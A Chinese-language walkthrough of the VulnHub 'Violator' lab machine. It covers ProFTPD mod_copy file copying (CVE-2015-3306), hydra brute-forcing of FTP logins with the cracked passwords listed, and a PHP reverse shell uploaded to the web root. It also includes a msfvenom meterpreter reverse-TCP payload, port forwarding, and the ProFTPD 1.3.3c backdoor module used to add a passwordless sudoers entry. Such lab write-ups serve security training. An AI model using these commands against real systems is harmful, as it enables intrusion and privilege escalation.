Violator: 1
项目地址:https://download.vulnhub.com/violator/violator.ova
是一个打包好的镜像文件
注意:导入 vmx 时一定要选择我已移动,否则没网
使用 Nmap 扫描出开放服务及操作系统版本
远程文件复制
ProFTPD(CVE-2015-3306)
发现开启了 FTP 服务,尝试连接
服务版本为 ProFTPD 1.3.5rc3
使用 searchsploit 查询该版本,发现存在 mod_copy 模块的远程文件复制漏洞(CVE-2015-3306)
该漏洞允许未认证的攻击者通过 SITE CPFR 和 SITE CPTO 命令在服务器上任意复制文件
尝试匿名登录,尽管登录失败(返回 530 Login incorrect),但 FTP 会话并未立即断开,且 SITE 命令仍可执行
1 | site CPFR /etc/passwd # 指定源文件为系统密码文件 |
服务器返回 250 Copy successful,表明复制成功
通过浏览器访问
弱口令
FTP
根据提示(主页链接到 Violator 专辑维基页面),手动提取专辑歌曲名,制作密码字典(如 worldinmyeyes、personaljesus、enjoythesilence 等)
1 | hydra -L userlist.txt -P passlist.txt ftp://192.168.187.152 |
成功得到四组有效凭证:
dg:policyoftruthmg:bluedressaf:enjoythesilenceaw:sweetestperfection
分别使用以上凭证登录 FTP,发现每个用户的家目录下都有独特文件:
af目录包含 Minarke(一个 Enigma 模拟器程序)aw目录有hint文件,提示“最终需要破解 Enigma”mg目录下的faith_and_devotion文件给出了 Enigma 的配置参数:- 使用德军三转子机型
- 反射器 B
- 初始位置 A B C
- 转子环设置 C B A
- 插线板 A-B, C-D
dg目录包含大量文件,其中bd/sbin/proftpd是一个旧版本(1.3.3c)的 ProFTPD 二进制
RCE
FTP
由于 Web 目录 /var/www/html 可写(之前复制 /etc/passwd 时已验证),通过 FTP 将 PHP 反向 Shell 脚本上传至该目录
1 | ftp> put php-reverse-shell.php /var/www/html/shell.php |
再次访问 shell.php 拿到 Shell
提权
Python 升级为交互式 Shell
1 | python -c 'import pty;pty.spawn("/bin/bash")' |
敏感信息泄露
使用之前拿到的用户名密码提权
后门(CVE-2010-3852)
检查权限发现可以运行一个程序
运行该程序查看版本
ProFTPD 1.3.3c 版本存在一个已知后门漏洞(CVE-2010-3852 )。攻击者可以构造特定请求执行任意系统命令
运行发现只能本地打这个 2121 端口
打算通过 MSF 做一个端口转发,先生成一个 MSF 木马
1 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=4444 -f elf -o payload.elf |
通过 FTP 服务上传
MSF 设置监听
1 | use exploit/multi/handler |
加权限执行
上线成功
创建新会话
1 | sessions -u 3 |
进入会话进行端口转发
1 | meterpreter > portfwd add -L 127.0.0.1 -l 6666 -p 2121 -r 127.0.0.1 |
在 Metasploit 中切换到后门利用模块,并设置参数
1 | # 将字符串 dg ALL=(ALL) NOPASSWD: ALL 写入文件 /etc/sudoers.d/dg |
1 | msf > use exploit/unix/ftp/proftpd_133c_backdoor |
提权成功
